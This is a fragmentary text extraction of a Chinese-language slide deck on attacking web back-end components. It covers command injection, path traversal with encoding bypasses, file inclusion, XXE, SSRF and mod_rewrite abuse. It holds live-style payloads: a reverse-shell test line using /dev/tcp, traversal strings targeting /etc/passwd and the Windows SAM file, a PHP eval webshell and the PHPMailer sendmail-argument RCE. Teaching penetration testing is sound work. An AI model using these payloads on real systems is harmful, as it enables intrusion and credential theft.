攻击后端组件.pptx

攻击后端组件;操作系统：Linux/Windows;Web服务器内置的API与OS直接进行交互 PHP：exec() ASP：wscript.shell() JSP：Runtime.getRuntime().exec() Python: os.system()、popen() 用户可控制输入参数 程序员过滤不严格;字符;字符;基本时间延迟推断 【|| ping -c 30 || ping -n 30 】 输出回显测试 【ls;dir】 反弹shell测试 【bash?-i??/dev/tcp//8080?01】 提权 横向破坏 ;nslookup wget -o sendmail（CVE-2016-10033中，PHPMailer的RCE） -X logfile是记录log文件的，就是可以写文件； -C file是临时加载一个配置文件，就是可以读文件； -O option=value 是临时设置一个邮件存储的临时目录的配置。 ;路径遍历漏洞 /1/2/../../../../../../../etc/passwd /1/2/../../../../../../../windows/win.ini 确定攻击目标 路径 参数：file=../../../../../etc/passwd 文件上传/下载、说明文档、上传图像 基本测试 f=a/b.txt VS f=a/c/../b.txt 根目录测试 ../../../../../../../../../../../../../../../../../../ 有写权限时 基础测试 c:/1.txt c:/windows/system32/config/sam 根目录访问测试 ;绕过净化函数 ../..\ …./\ %2e、%u002e、%252e、%c0%2e 绕过前缀后缀检查函数 Filestore/../../../../../../../../../../etc/passwd ../../boot.ini%00.jpg 绕过定制编码 ../../../../etc/passwd/../../tmp/foo Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZC8uLi8uLi90bXAvZm9v ;可读文件 密码 配置文件 数据库证书 数据库源文件 Xml文件 源代码 日志文件（可能包含用户名/密码/sessionid） 可写文件 创建启动脚本 创建webshell ;Php：eval($_GET[‘passwd’]) Perl：eval() ;测试位置 Cookie名和cookie值 提交payload ;echo%2012345 :response.write%2012345 System(‘ping %20n’) Phpinfo(); ;PHP远程文件包含漏洞 http://a.php?country=US $country=$_GET[‘country’]; include($country . ‘.php’); 测试步骤 有一个远程服务器和URL 用一个不存在的URL测试是否超时 本地文件包含漏洞 测试步骤 静态资源包含测试 ;XXE攻击 !DOCTYPE foo [ ! ENTITY xxe SYSTEM “FILE:///windows/win.ini” ] searchxxe;/search SOAP注入 破坏程序逻辑;SSRF 代理服务器 内网跳板 XSS 测试步骤 查找IP或URL格式的参数 ;;Apache mod_rewrite RewriteRule ^pub/user/ ([^/\.]+)$ /inc/usr.php?mode=viewname=$1 /pub/user/tom - /inc/user.php?mode=viewname=tom /pub/user/tom%26mode=edit ;Thanks！;Shell解析脚本的过程;注入电子邮件